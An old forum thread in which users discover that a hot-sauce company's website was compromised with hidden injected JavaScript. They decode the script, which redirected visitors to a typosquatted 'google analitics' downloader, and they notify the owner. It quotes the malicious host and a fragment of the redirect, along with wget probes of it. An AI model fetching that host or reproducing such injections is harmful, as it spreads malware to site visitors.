Anyone else get a trojan warning when they google "Chilli Willies"

Here is the link but don't click on it without Avast!
Spoiler:
http://www.google.com.au/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-GB%3Aofficial&hs=nyq&q=chilli+willies&btnG=Search&meta=

damn lucky i had avast on.
i dont think its safe to link like that man.

DONT CLICK WITHOUT ANTIVIRUS!

You get a trojan warning when you just google that thing? What AV are you using? What browser/OS?

yeah just from googling

any details on the warning you got?

avast! here
if this is a false positive I would be so pissed if I was the Chilli Willies man. (assuming there is such a man)
If this is their fault it brings new meaning to their slogan "Be WARNED I may BITE back!".

You can get potential warnings from javascript in a link on the site. I also see there is a youtube preview linked on that page when I load it. There are a number of flash/SWF exploits rolling around at the moment, but I've not seen them come from youtube (which is where that video is from).

Js: Cruiser-B [Trj]
Trojan

A trojan horse was found, yadda yadda yadda

Filename: http://www.chilliwillies.com.au/
Malware name: JS:Cruzer-B [Trj]
Malware type: Trojan Horse
VPS version: 090804-0, 04/08/2009

Ok, its been compromised.

Looking into it now.

wget the front page and after a chunk of whitespace is some appended javascript.

Nice catch Avast! :P

Why would you google Chilli Willies? Is that some sort of gay restaurant or something?

Ok, its been compromised.

Looking into it now.

wget the front page and after a chunk of whitespace is some appended javascript.

Nice catch Avast! :P

weird, I don't see that after going to the page and saving it out as .html (from firefox)

lemme know if I need to start panicking

Chilli Willies? Is that some sort of gay restaurant or something?

Why don't you look at the site and find out? :D

It's an australian company that makes chilli sauces, I was just enjoying splashing some on my kebab right now and thought I'd look up their site.

Ahh, yes I have their "Calypso Tropical Butt Burner" in the cupboard. Got it at the Chop Shop in the Coco's complex @ Annerley about 3 years ago.

The html file when I viewed it in hex has the whitespace filled with %0a%0d which is /r/n. So your normal viewer may not load it correctly. I used Wget on a linux box and then just cat the index.html and see the script.

i clicked it and no virus warning

i dont have antivirus either

The html file when I viewed it in hex has the whitespace filled with %0a%0d which is /r/n. So your normal viewer may not load it correctly. I used Wget on a linux box and then just cat the index.html and see the script.

yeh wget was the first thing I tried, except weirdly (in windows anyway) wget'ing that URL gives me a 403 error.

funny story, reading the above post I didn't know you could wget in windows, so I googled wget in windows and on the first page is trog's website.

i googled 'chilli willies'. there website was at the top of the search results. i clicked the link, went to there site........what next?

enter your credit card details :)

hot ranga > chilli willies

Just finished decoding the javascript, and the link it went to is now dead. :(

It was redirecting to a dynamic downloader on http://www.google analitics ">.net/__utb.js?"+document.reerrer+"\"> but was broken in the script :]

[parody@vps ~]$ wget "http://www.google analitics .net/__utb.js" -U="Internet Explorer 6.0"
--16:35:57-- http://www.google analitics .net/__utb.js
Resolving www.google analitics .net... 85.249.131.46
Connecting to www.google analitics .net|85.249.131.46|:80...
and that connection times out.

My personal shell has the IP cached. My work threatbox doesn't :(

parody@threatbox:~$ nslookup www.google analitics .net
Server: 4.2.2.1
Address: 4.2.2.1#53

Non-authoritative answer:
Name: www.google analitics .net
Address: 127.0.0.1

parody@threatbox:~$

If I wasn't so busy I could have caught the binary :( oh well.

Took too long to rebuild my spidermonkey install. Makes processing javascript so easy but new threatbox didn't have it installed. Very handy tool if you're into malware analysis. Mine is modded to include handling of document.write, eval() and alert() to external files. It still sucks for recursive code that needs to be decoded to fix the references to defines in the javascript. Have to cut and process in steps to figure that out and then build a big final script to process the lot.

http://blog.didierstevens.com/programs/spidermonkey/ this already has some modifications done to it which I based my further mods from.

just gonna write their details here while I've got the sauce bottle with me

Chilli Willies, 4 Cowley Dr, Flinders View, Q, 4305
07 3288 6228, 0419 646 305, info@chilliwillies.com.au

might send an email or something later?

last edited by thermite at 16:56:13 04/Aug/09

I've just sent an email to the chilliwillies guys to inform them of the infection. Should hopefully get them fixed up quick. :]

Cool, well nerded.

Nerding? I do! :]

last edited by pARODY at 17:42:55 04/Aug/09

Just finished decoding the javascript, and the link it went to is now dead. :(

Googling tells me its an attack thing that was around last year so I'm guessing its been long gone

I just checked our known_malicious list and its a site that has been around since 2002 and changed owners a couple times but always involved in hosting dodgy stuff. Last activity on our list is from February.

jesus there is plenty of nerding it up in this thread.

well played old chaps

Hi Chilli Willies here yes their was a trojan on my web site but this has been removed was a script on the tittle page, not much good all talking about and not telling me??

Thank you for the was not sure who sent it as I get so much spam

I have owned Chilli Willies Sauces since 2001 and wonder what is so dogdy about hot sauce?

Chilli Willies here yes pissed off considering new nothing of the trojan

well your poo feels like it's got razor blades in it

anyways I think he meant the website/host was dodgy, not the sauce

Web Host was Is Melbourne IT when I found out about the Trojan called them they confimed and they removed it for me straight away